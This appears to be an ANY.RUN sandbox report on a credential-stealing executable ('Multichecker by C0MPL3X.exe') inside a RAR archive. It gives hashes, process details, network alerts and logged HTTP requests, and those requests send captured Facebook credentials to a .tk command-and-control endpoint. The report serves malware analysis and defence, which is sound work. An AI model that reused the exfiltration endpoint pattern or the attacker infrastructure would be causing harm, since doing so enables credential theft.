analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

30.rar

Full analysis: https://app.any.run/tasks/f5c40381-3c8c-4542-9f3c-9188d877eee0
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: April 23, 2019, 08:29:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
stealer
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

00F3050955C9636E9060F754CF4B31EC

SHA1:

0E2C238A9519BADD19D08850E467D622299E0729

SHA256:

170F1A12C562AFF1A4F2D4C5D6D3B4779E7C11E523A06D84065C09640EFD490B

SSDEEP:

196608:zp9Wtkh57+eCYNd61GkqWa9XBG7FXSsgV4w:7wqzXI7zo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Multichecker by C0MPL3X.exe (PID: 4052)
    • Sending of credential data detected

      • Multichecker by C0MPL3X.exe (PID: 4052)
    • Actions looks like stealing of personal data

      • Multichecker by C0MPL3X.exe (PID: 4052)
    • Changes settings of System certificates

      • Multichecker by C0MPL3X.exe (PID: 4052)
  • SUSPICIOUS

    • Loads DLL from Mozilla Firefox

      • Multichecker by C0MPL3X.exe (PID: 4052)
    • Adds / modifies Windows certificates

      • Multichecker by C0MPL3X.exe (PID: 4052)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs multichecker by c0mpl3x.exe

Process information

PID
CMD
Path
Indicators
Parent process
3940"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\30.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
4052"C:\Users\admin\Desktop\Multichecker by C0MPL3X.exe" C:\Users\admin\Desktop\Multichecker by C0MPL3X.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Description:
Multichecker by C0MPL3X
Exit code:
0
Version:
1.0.0.0
Total events
490
Read events
446
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3940WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3940.19802\Multichecker by C0MPL3X.exe
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4052
Multichecker by C0MPL3X.exe
GET
200
185.176.43.92:80
http://murtlarmuhadi.tk/farim/api.php/?action=logInfo&text=---------------------------------------------------------------------------------------------------------------------------------------
BG
binary
1 b
malicious
4052
Multichecker by C0MPL3X.exe
GET
200
185.176.43.92:80
http://murtlarmuhadi.tk/farim/api.php/?action=logInfo&text=%7C4/23/2019%209:30:04%20AM%7C%20admin%20%7C212.7.219.109%7C%0D%0A%0D%0A%0D%0AAccount%20Type:%20%20%20%20%20%20%20%201%0D%0ADomain:%20%20%20%20%20%20https://m.facebook.com/%0D%0AUsername:%20%20%20%[email protected]%0D%0APassword:%20%20%20%20honeypass356%0D%0A%0D%0A%0D%0A%0D%0A---------------------------------------------------------------------------------------------------------------------------------------
BG
binary
1 b
malicious
4052
Multichecker by C0MPL3X.exe
GET
200
185.176.43.92:80
http://murtlarmuhadi.tk/farim/api.php/?action=logInfo&text=%7C4/23/2019%209:30:05%20AM%7C%20admin%20%7C212.7.219.109%7C%0D%0A%0D%0A%0D%0AAccount%20Type:%20%20%20%20%20%20%20%200%0D%0ADomain:%20%20%20%20%20%20https://m.facebook.com%0D%0AUsername:%20%20%20%20%0D%0APassword:%20%20%20%20%0D%0A%0D%0A%0D%0A%0D%0A---------------------------------------------------------------------------------------------------------------------------------------
BG
binary
1 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4052
Multichecker by C0MPL3X.exe
46.30.213.163:443
tools.feron.it
One.com A/S
DK
unknown
4052
Multichecker by C0MPL3X.exe
185.176.43.92:80
murtlarmuhadi.tk
Zetta Hosting Solutions LLC.
BG
malicious

DNS requests

Domain
IP
Reputation
tools.feron.it
  • 46.30.213.163
suspicious
murtlarmuhadi.tk
  • 185.176.43.92
malicious

Threats

PID
Process
Class
Message
4052
Multichecker by C0MPL3X.exe
A Network Trojan was detected
ET CURRENT_EVENTS Possible Credentials Sent to Suspicious TLD via HTTP GET
4052
Multichecker by C0MPL3X.exe
Potentially Bad Traffic
ET POLICY HTTP Request to a *.tk domain
4052
Multichecker by C0MPL3X.exe
A Network Trojan was detected
ET CURRENT_EVENTS Possible Credentials Sent to Suspicious TLD via HTTP GET
4052
Multichecker by C0MPL3X.exe
Potentially Bad Traffic
ET POLICY HTTP Request to a *.tk domain
4052
Multichecker by C0MPL3X.exe
Potentially Bad Traffic
ET POLICY HTTP Request to a *.tk domain
No debug info